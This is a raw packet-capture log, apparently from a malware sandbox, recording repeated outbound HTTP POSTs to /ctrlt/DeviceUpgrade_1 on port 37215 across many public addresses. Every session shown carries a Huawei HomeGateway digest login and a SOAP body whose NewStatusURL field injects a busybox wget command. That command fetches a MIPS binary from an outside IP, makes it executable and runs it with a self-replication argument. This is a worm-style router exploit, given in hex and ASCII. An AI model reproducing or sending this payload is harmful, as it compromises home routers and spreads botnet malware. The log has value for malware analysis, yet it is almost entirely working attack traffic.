                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1257192.168.2.1335908197.219.191.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449246883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1258192.168.2.134095641.126.102.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449250937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1259192.168.2.1333920197.55.194.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449259043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1260192.168.2.1351216157.162.253.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449292898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1261192.168.2.1343118157.251.103.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449292898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1262192.168.2.1343668197.29.216.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449321985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1263192.168.2.134583441.1.246.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449868917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1264192.168.2.135427441.42.90.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449875116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1265192.168.2.133324241.49.41.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449918985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1266192.168.2.1360162197.244.101.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449944973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 